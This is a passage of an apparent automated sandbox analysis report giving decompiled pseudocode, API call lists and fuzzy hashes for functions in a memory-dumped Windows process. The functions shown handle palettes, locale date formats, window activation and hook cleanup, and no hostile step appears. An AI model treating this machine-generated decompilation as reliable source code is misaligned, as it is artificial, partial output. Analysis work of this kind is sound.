					 *(_t45 + 0x10) = _t43;
					if(_t43 == 0) {
						_t44 = E009608A8(GetDC(0));
						if( *((char*)(_t45 + 0x71)) != 0) {
							L9:
							_t34 = 1;
						} else {
							_t29 = GetDeviceCaps(_t44, 0xc);
							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
								goto L9;
							} else {
								_t34 = 0;
							}
						}
						 *((char*)(_t45 + 0x71)) = _t34;
						if(_t34 != 0) {
							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
						}
						_t21 = ReleaseDC(0, _t44);
						if( *(_t45 + 0x10) == 0) {
							 *((char*)(_t42 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                            0x0096343c
                                            0x00963440
                                            0x00963442
                                            0x00963449
                                            0x00963463
                                            0x00963469
                                            0x0096346b
                                            0x0096346b
                                            0x00963482
                                            0x00963487
                                            0x00963489
                                            0x0096348e
                                            0x0096349c
                                            0x009634a2
                                            0x009634cb
                                            0x009634cb
                                            0x009634a4
                                            0x009634a7
                                            0x009634c5
                                            0x00000000
                                            0x009634c7
                                            0x009634c7
                                            0x009634c7
                                            0x009634c5
                                            0x009634cd
                                            0x009634d2
                                            0x009634da
                                            0x009634da
                                            0x009634e0
                                            0x009634e9
                                            0x009634eb
                                            0x00000000
                                            0x009634eb
                                            0x009634e9
                                            0x0096348e
                                            0x009634f3

                                            APIs
                                            • GetDC.USER32 ref: 00963492
                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009634A7
                                            • GetDeviceCaps.GDI32(00000000,0000000E), ref: 009634B1
                                            • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00962073,00000000,009620FF), ref: 009634D5
                                            • ReleaseDC.USER32 ref: 009634E0
                                              • Part of subcall function 00961E9C: SetRectEmpty.USER32 ref: 00961EE9
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CapsDevice$CreateEmptyHalftonePaletteRectRelease
                                            • String ID:
                                            • API String ID: 1106568186-0
                                            • Opcode ID: a4f88ac66bac1841eba7c33fe73c4ac91f39b32c1cdef3ecc2bd3e3111ecae1f
                                            • Instruction ID: b006fd1bc708019c4f26ec72c8943742de32e3a342b46ec4215fbafd7059f546
                                            • Opcode Fuzzy Hash: a4f88ac66bac1841eba7c33fe73c4ac91f39b32c1cdef3ecc2bd3e3111ecae1f
                                            • Instruction Fuzzy Hash: 8B1104617013999EDB32EF34D441BEE7BD9AF82315F448121FD049B291DBB18E90C3A1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00960F00, Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 70%
                                            			E00960F00(void* __eax) {
				char _v5;
				struct HDC__* _v12;
				struct HPALETTE__* _t21;
				struct HPALETTE__* _t25;
				void* _t28;
				intOrPtr _t35;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t37 = _t39;
				_t40 = _t39 + 0xfffffff8;
				_t28 = __eax;
				_v5 = 0;
				if( *0x99c894 == 0) {
					return _v5;
				} else {
					_v12 = GetDC(0);
					_push(_t37);
					_push(0x960f86);
					_push( *[fs:edx]);
					 *[fs:edx] = _t40;
					if(GetDeviceCaps(_v12, 0x68) >= 0x10) {
						_t21 =  *0x99c894; // 0xbf08074c
						GetPaletteEntries(_t21, 0, 8, _t28 + 4);
						_t25 =  *0x99c894; // 0xbf08074c
						GetPaletteEntries(_t25, 8, 8, _t28 + ( *(_t28 + 2) & 0x0000ffff) * 4 - 0x1c);
						_v5 = 1;
					}
					_pop(_t35);
					 *[fs:eax] = _t35;
					_push(0x960f8d);
					return ReleaseDC(0, _v12);
				}
			}












                                            0x00960f01
                                            0x00960f03
                                            0x00960f07
                                            0x00960f09
                                            0x00960f14
                                            0x00960f94
                                            0x00960f16
                                            0x00960f1d
                                            0x00960f22
                                            0x00960f23
                                            0x00960f28
                                            0x00960f2b
                                            0x00960f3c
                                            0x00960f46
                                            0x00960f4c
                                            0x00960f5e
                                            0x00960f64
                                            0x00960f69
                                            0x00960f69
                                            0x00960f6f
                                            0x00960f72
                                            0x00960f75
                                            0x00960f85
                                            0x00960f85

                                            APIs
                                            • GetDC.USER32 ref: 00960F18
                                            • GetDeviceCaps.GDI32(?,00000068), ref: 00960F34
                                            • GetPaletteEntries.GDI32(BF08074C,00000000,00000008,?), ref: 00960F4C
                                            • GetPaletteEntries.GDI32(BF08074C,00000008,00000008,?), ref: 00960F64
                                            • ReleaseDC.USER32 ref: 00960F80
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: EntriesPalette$CapsDeviceRelease
                                            • String ID:
                                            • API String ID: 3128150645-0
                                            • Opcode ID: 592a29b903cad362b71ca8a03f9be872fa7d5c45420905438a9aa894c0b77578
                                            • Instruction ID: 17db730d490709967bfa8b43307ab85400e35ff2819bf70352b7f427f1c5260c
                                            • Opcode Fuzzy Hash: 592a29b903cad362b71ca8a03f9be872fa7d5c45420905438a9aa894c0b77578
                                            • Instruction Fuzzy Hash: 2B11C4B164C304AEFB14DFA89C86FAA7BF8E7C5704F048096F608DA1C1DA769404C725
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096EA90, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0096EA90(intOrPtr* __eax, void* __edx) {
				void* _t12;
				intOrPtr* _t25;
				intOrPtr _t33;
				void* _t42;

				_t42 = __edx;
				_t25 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000008;
				_t33 =  *0x96bb70; // 0x96bbbc
				if(E009432B8( *((intOrPtr*)(__edx + 0x2c)), _t33) != 0) {
					 *((intOrPtr*)( *_t25 + 0x68))();
				}
				_t12 = E0095CA88(_t25, _t42);
				 *(_t25 + 0x54) =  *(_t25 + 0x54) & 0x0000fff7;
				if( *((intOrPtr*)(_t25 + 0x30)) != 0) {
					SetActiveWindow(0);
					SetActiveWindow(0);
					SetActiveWindow(0);
					SetActiveWindow(0);
					return SetActiveWindow(0);
				}
				return _t12;
			}







                                            0x0096ea93
                                            0x0096ea95
                                            0x0096ea97
                                            0x0096eaa1
                                            0x0096eaae
                                            0x0096eab6
                                            0x0096eab6
                                            0x0096eabd
                                            0x0096eac2
                                            0x0096eacb
                                            0x0096ead8
                                            0x0096eae8
                                            0x0096eaf8
                                            0x0096eb08
                                            0x00000000
                                            0x0096eb18
                                            0x0096eb20

                                            APIs
                                            • SetActiveWindow.USER32(00000000), ref: 0096EAD8
                                            • SetActiveWindow.USER32(00000000,00000000), ref: 0096EAE8
                                            • SetActiveWindow.USER32(00000000,00000000,00000000), ref: 0096EAF8
                                            • SetActiveWindow.USER32(00000000,00000000,00000000,00000000), ref: 0096EB08
                                            • SetActiveWindow.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0096EB18
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ActiveWindow
                                            • String ID:
                                            • API String ID: 2558294473-0
                                            • Opcode ID: 1f489c92ac564ee86452b944c1fe387785112e8f8182d2816d74b3dfa0bf609d
                                            • Instruction ID: 206d7b856026dd2bc5ab279b26435fabf90faba59299b3c4fa4d3f8a22da00fb
                                            • Opcode Fuzzy Hash: 1f489c92ac564ee86452b944c1fe387785112e8f8182d2816d74b3dfa0bf609d
                                            • Instruction Fuzzy Hash: D4014F3231130097E7086A3D9D8A71B63999BC4B01F50D03FB40ADB3D7CEB9DC0A8684
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094B010, Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E0094B010(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x94b0a7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0094AD88(GetThreadLocale(), 0x94b0bc, 0x100b,  &_v8);
				_t29 = E00948138(0x94b0bc, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0094AF5C, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x99c770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0094AF98, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(0x94b0ae);
				return E00943FB0( &_v8);
			}










                                            0x0094b010
                                            0x0094b013
                                            0x0094b018
                                            0x0094b019
                                            0x0094b01e
                                            0x0094b021
                                            0x0094b037
                                            0x0094b049
                                            0x0094b053
                                            0x0094b063
                                            0x0094b068
                                            0x0094b06d
                                            0x0094b072
                                            0x0094b072
                                            0x0094b078
                                            0x0094b07b
                                            0x0094b07b
                                            0x0094b08c
                                            0x0094b08c
                                            0x0094b093
                                            0x0094b096
                                            0x0094b099
                                            0x0094b0a6

                                            APIs
                                            • GetThreadLocale.KERNEL32(?,00000000,0094B0A7,?,?,00000000), ref: 0094B028
                                              • Part of subcall function 0094AD88: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0094ADA6
                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0094B0A7,?,?,00000000), ref: 0094B058
                                            • EnumCalendarInfoA.KERNEL32(Function_0000AF5C,00000000,00000000,00000004), ref: 0094B063
                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0094B0A7,?,?,00000000), ref: 0094B081
                                            • EnumCalendarInfoA.KERNEL32(Function_0000AF98,00000000,00000000,00000003), ref: 0094B08C
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Locale$InfoThread$CalendarEnum
                                            • String ID:
                                            • API String ID: 4102113445-0
                                            • Opcode ID: 3e67f018d0ba85210ba45ea9683582469c78373dac1682f027d467c39aeffad7
                                            • Instruction ID: 0e2fd8d7583a9c498c9ab85873785724f56ce8e2e60c6d19fd78742f5ed3196b
                                            • Opcode Fuzzy Hash: 3e67f018d0ba85210ba45ea9683582469c78373dac1682f027d467c39aeffad7
                                            • Instruction Fuzzy Hash: 5601F2B12007047BEB21ABB48C13F5F72ACDBC7724F904660F420E66C5E7649E0186A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0098D310, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0098D310() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x99cbd0 != 0) {
					_t10 =  *0x99cbd0; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x99cbd0 = 0;
				if( *0x99cbd4 != 0) {
					_t2 =  *0x99cbcc; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x99cbc8) {
						_t8 =  *0x99cbd4; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x99cbd4; // 0x0
					CloseHandle(_t5);
					 *0x99cbd4 = 0;
					return 0;
				}
				return 0;
			}







                                            0x0098d317
                                            0x0098d319
                                            0x0098d31f
                                            0x0098d31f
                                            0x0098d326
                                            0x0098d332
                                            0x0098d334
                                            0x0098d33a
                                            0x0098d34a
                                            0x0098d34e
                                            0x0098d354
                                            0x0098d354
                                            0x0098d359
                                            0x0098d35f
                                            0x0098d366
                                            0x00000000
                                            0x0098d366
                                            0x0098d36b

                                            APIs
                                            • UnhookWindowsHookEx.USER32(00000000), ref: 0098D31F
                                            • SetEvent.KERNEL32(00000000,0098F50A), ref: 0098D33A
                                            • GetCurrentThreadId.KERNEL32 ref: 0098D33F
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0098F50A), ref: 0098D354
                                            • CloseHandle.KERNEL32(00000000,00000000,0098F50A), ref: 0098D35F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                            • String ID:
                                            • API String ID: 2429646606-0
                                            • Opcode ID: a38e8c03357d8d8512a9b740e5ebad91d9cdf23678bf3ede1dd0a807dd9390fb
                                            • Instruction ID: 43df69938b45d7981cadfabd25fd3f741ad7da169774b87e7e17b6f2347fca10
                                            • Opcode Fuzzy Hash: a38e8c03357d8d8512a9b740e5ebad91d9cdf23678bf3ede1dd0a807dd9390fb
                                            • Instruction Fuzzy Hash: B3F0C9F16AA2009BEB50FBBCEC4BF0937E8A745305F440517B110C32A1C7359444EB22
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094B0C0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 83%
                                            			E0094B0C0(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x94b28a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00943FB0(__edx);
				E0094AD88(GetThreadLocale(), 0x94b2a0, 0x1009,  &_v12);
				if(E00948138(0x94b2a0, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00944270(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							break;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x99a11c], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00948708(_t124 + _t92 - 1, 2, 0x94b2a4);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00948708(_t124 + _t92 - 1, 4, 0x94b2b4);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00948708(_t124 + _t92 - 1, 2, 0x94b2cc);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00944278(_t122, 0x94b2e4);
											L26:
											_t92 = _t92 + 1;
											__eflags = _t92;
											continue;
										}
										__eflags = _t51 != 0x20;
										if(_t51 != 0x20) {
											E00944198();
											E00944278(_t122, _v24);
											goto L26;
										}
										goto L24;
									}
									E00944278(_t122, 0x94b2d8);
									_t92 = _t92 + 1;
									goto L26;
								}
								E00944278(_t122, 0x94b2c4);
								_t92 = _t92 + 3;
								goto L26;
							}
							E00944278(_t122, 0x94b2b0);
							_t92 = _t92 + 1;
							goto L26;
						}
						_v8 = E0094C178(_t124, _t92);
						E009444D0(_t124, _v8, _t92,  &_v20);
						E00944278(_t122, _v20);
						_t92 = _t92 + _v8;
					}
					L28:
					_pop(_t111);
					 *[fs:eax] = _t111;
					_push(0x94b291);
					return E00943FD4( &_v24, 4);
				}
				_t75 =  *0x99c748; // 0x9
				_t76 = _t75 - 4;
				if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
					_t77 = 1;
				} else {
					_t77 = 0;
				}
				if(_t77 == 0) {
					E00944004(_t122, _t124);
				} else {
					while(_t92 <= E00944270(_t124)) {
						_t83 =  *(_t124 + _t92 - 1) - 0x47;
						__eflags = _t83;
						if(_t83 != 0) {
							__eflags = _t83 != 0x20;
							if(_t83 != 0x20) {
								E00944198();
								E00944278(_t122, _v16);
							}
						}
						_t92 = _t92 + 1;
						__eflags = _t92;
					}
				}
			}























                                            0x0094b0c0
                                            0x0094b0c5
                                            0x0094b0c6
                                            0x0094b0c7
                                            0x0094b0c8
                                            0x0094b0c9
                                            0x0094b0cd
                                            0x0094b0cf
                                            0x0094b0d3
                                            0x0094b0d4
                                            0x0094b0d9
                                            0x0094b0dc
                                            0x0094b0df
                                            0x0094b0e6
                                            0x0094b0fe
                                            0x0094b116
                                            0x0094b260
                                            0x0094b262
                                            0x0094b267
                                            0x0094b269
                                            0x00000000
                                            0x00000000
                                            0x0094b17f
                                            0x0094b184
                                            0x0094b18b
                                            0x0094b1c9
                                            0x0094b1ce
                                            0x0094b1d0
                                            0x0094b1ef
                                            0x0094b1f4
                                            0x0094b1f6
                                            0x0094b217
                                            0x0094b21c
                                            0x0094b21e
                                            0x0094b233
                                            0x0094b233
                                            0x0094b235
                                            0x0094b23b
                                            0x0094b242
                                            0x0094b25f
                                            0x0094b25f
                                            0x0094b25f
                                            0x00000000
                                            0x0094b25f
                                            0x0094b237
                                            0x0094b239
                                            0x0094b250
                                            0x0094b25a
                                            0x00000000
                                            0x0094b25a
                                            0x00000000
                                            0x0094b239
                                            0x0094b227
                                            0x0094b22c
                                            0x00000000
                                            0x0094b22c
                                            0x0094b1ff
                                            0x0094b204
                                            0x00000000
                                            0x0094b204
                                            0x0094b1d9
                                            0x0094b1de
                                            0x00000000
                                            0x0094b1de
                                            0x0094b196
                                            0x0094b1a4
                                            0x0094b1ae
                                            0x0094b1b3
                                            0x0094b1b3
                                            0x0094b26f
                                            0x0094b271
                                            0x0094b274
                                            0x0094b277
                                            0x0094b289
                                            0x0094b289
                                            0x0094b11c
                                            0x0094b121
                                            0x0094b124
                                            0x0094b132
                                            0x0094b12e
                                            0x0094b12e
                                            0x0094b12e
                                            0x0094b136
                                            0x0094b171
                                            0x0094b138
                                            0x0094b15d
                                            0x0094b13e
                                            0x0094b13e
                                            0x0094b140
                                            0x0094b142
                                            0x0094b144
                                            0x0094b14d
                                            0x0094b157
                                            0x0094b157
                                            0x0094b144
                                            0x0094b15c
                                            0x0094b15c
                                            0x0094b15c
                                            0x0094b168

                                            APIs
                                            • GetThreadLocale.KERNEL32(?,00000000,0094B28A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0094B0EF
                                              • Part of subcall function 0094AD88: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0094ADA6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Locale$InfoThread
                                            • String ID: eeee$ggg$yyyy
                                            • API String ID: 4232894706-1253427255
                                            • Opcode ID: 2bf5f054ea5d9f596931fa6c76c77c81df9e5f93004e4f0336c802585d5427bf
                                            • Instruction ID: aae06e91ea1cdf1ff29d6554ee8344e881cc3886c09181224a287ff1710ed411
                                            • Opcode Fuzzy Hash: 2bf5f054ea5d9f596931fa6c76c77c81df9e5f93004e4f0336c802585d5427bf
                                            • Instruction Fuzzy Hash: C141D3307186054BDB11AAB888A1FBEB3EADBEA300F604525E471D3356EBB4DD069751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094C9F8, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0094C9F8() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x99a140 = _t1;
				}
				if( *0x99a140 == 0) {
					 *0x99a140 = E00948554;
					return E00948554;
				}
				return _t1;
			}





                                            0x0094c9fe
                                            0x0094ca03
                                            0x0094ca07
                                            0x0094ca0f
                                            0x0094ca14
                                            0x0094ca14
                                            0x0094ca20
                                            0x0094ca27
                                            0x00000000
                                            0x0094ca27
                                            0x0094ca2d

                                            APIs
                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0094D461,00000000,0094D474), ref: 0094C9FE
                                            • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0094CA0F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                            • API String ID: 1646373207-3712701948
                                            • Opcode ID: b640d28cd68ec8583a890ac631503ad2c0233fa5455433afddb6ed9231ee1351
                                            • Instruction ID: 9da6917fabcdc541b52a0411beaa34acd23b397f6ce8d763bc874aa6da72766b
                                            • Opcode Fuzzy Hash: b640d28cd68ec8583a890ac631503ad2c0233fa5455433afddb6ed9231ee1351
                                            • Instruction Fuzzy Hash: D2D0C7F16193595FDB74DFBD5CC1F2535D8E749708F001526F00156172DB748804D756
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0098F784, Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 84%
                                            			E0098F784(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				struct HWND__ _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t130;
				struct HWND__* _t166;
				intOrPtr _t188;
				char _t194;
				intOrPtr _t218;
				intOrPtr _t222;
				void* _t238;
				intOrPtr* _t250;
				intOrPtr _t270;
				intOrPtr _t271;
				intOrPtr _t273;
				intOrPtr _t279;
				intOrPtr* _t306;
				intOrPtr _t307;
				void* _t314;

				_t313 = _t314;
				_push(__ebx);
				_push(__esi);
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t270 =  *0x9856f8; // 0x9856fc
				E0094493C( &_v100, _t270);
				_t250 =  &_v8;
				_push(_t314);
				_push(0x98fb0a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t314 + 0xffffff70;
				 *((char*)( *_t250 + 0x58)) = 0;
				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E00985AB0() == 0 || E0098D188(E0096DF00( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
					L23:
					_t130 = _v52;
					__eflags = _t130;
					if(_t130 <= 0) {
						E0098F4EC( *_t250);
					} else {
						E0098F2F4( *_t250, 0, _t130);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E0098F524();
					_v84 = E0098C4BC();
					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
					E0096EFF4( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t306 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
					_t320 = _t306;
					if(_t306 == 0) {
						_t307 =  *((intOrPtr*)( *_t250 + 0x60));
						_t279 =  *0x96bb70; // 0x96bbbc
						_t166 = E009432B8(_t307, _t279);
						__eflags = _t166;
						if(_t166 != 0) {
							__eflags =  *(_t307 + 0x190);
							if( *(_t307 + 0x190) != 0) {
								ClientToScreen( *(_t307 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t306 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E0096F198( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E0098D150( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
					E0096C774(_v148,  &_v140,  &_v144, _t320);
					E00944048( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
					_t188 =  *0x99ac34; // 0x96c0f4
					_v96 = _t188;
					_v40 = 0;
					_v33 = SetActiveWindow( &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
						_t194 = 0;
					} else {
						_t194 = 1;
					}
					_t285 =  *_t250;
					 *((char*)( *_t250 + 0x58)) = _t194;
					if( *((char*)( *_t250 + 0x58)) == 0) {
						goto L23;
					} else {
						_t327 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E0098F678(_v96, _t285, _t313);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E00943328( *((intOrPtr*)( *_t250 + 0x84)), _t327) != 0) {
							_t238 = E0098F6D8(_v44, _t250, 0xffc8, _t313) + 5;
							_v116.left = _v116.left - _t238;
							_v116.right = _v116.right - _t238;
						}
						E0096F16C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
						_t218 =  *_t250;
						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
						E0096F16C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
						_t222 =  *_t250;
						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
						E0096F7B8( *((intOrPtr*)( *_t250 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
						E0098D29C(_v44);
						_t231 = _v52;
						if(_v52 <= 0) {
							E0098F2F4( *_t250, 1, _v48);
						} else {
							E0098F2F4( *_t250, 0, _t231);
						}
						L26:
						_pop(_t271);
						 *[fs:eax] = _t271;
						_push(0x98fb11);
						E00943FD4( &_v148, 2);
						_t273 =  *0x9856f8; // 0x9856fc
						return E00944A00( &_v100, _t273);
					}
				}
			}












































                                            0x0098f785
                                            0x0098f78d
                                            0x0098f78e
                                            0x0098f792
                                            0x0098f798
                                            0x0098f7a3
                                            0x0098f7a4
                                            0x0098f7a5
                                            0x0098f7ab
                                            0x0098f7b1
                                            0x0098f7b6
                                            0x0098f7bb
                                            0x0098f7bc
                                            0x0098f7c1
                                            0x0098f7c4
                                            0x0098f7c9
                                            0x0098f7d6
                                            0x0098fac3
                                            0x0098fac3
                                            0x0098fac6
                                            0x0098fac8
                                            0x0098fad9
                                            0x0098faca
